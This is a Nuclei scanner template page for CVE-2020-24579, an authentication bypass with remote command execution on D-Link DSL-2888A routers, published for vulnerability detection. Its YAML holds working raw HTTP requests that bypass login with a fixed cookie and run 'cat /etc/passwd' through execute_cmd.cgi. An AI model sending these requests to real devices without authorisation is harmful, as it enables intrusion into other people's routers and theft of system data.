Skip to content
Nuclei Templates

D-Link DSL 2888a - Authentication Bypass/Remote Command Execution

ID: CVE-2020-24579

Severity: high

Author: pikpikcu

Tags: cve,cve2020,dlink,rce

Description

Section titled “Description”

D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.

YAML Source

Section titled “YAML Source”
id: CVE-2020-24579


info:
  name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
  author: pikpikcu
  severity: high
  description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the vulnerability.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24579
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-24579
    cwe-id: CWE-287
    epss-score: 0.05447
    epss-percentile: 0.93154
    cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dlink
    product: dsl2888a_firmware
  tags: cve,cve2020,dlink,rce


http:
  - raw:
      - | # Response:Location: /page/login/login_fail.html
        POST / HTTP/1.1
        Host: {{Hostname}}
        Cookie: uid=6gPjT2ipmNz


        username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
      - | # Get /etc/passwd
        GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Cookie: uid=6gPjT2ipmNz


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "nobody:[x*]:65534:65534"
          - "root:.*:0:0:"
        condition: or


      - type: status
        status:
          - 200
# digest: 490a0046304402207ccd67bf5a3850685b6df8659070167c46e8ecbff177d078a104f4fcfa488c34022038a2da0f9e642d99804ffebf567ba1bd26501e9dde03d007e1587551b60b39d7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24579.yaml"

View on Github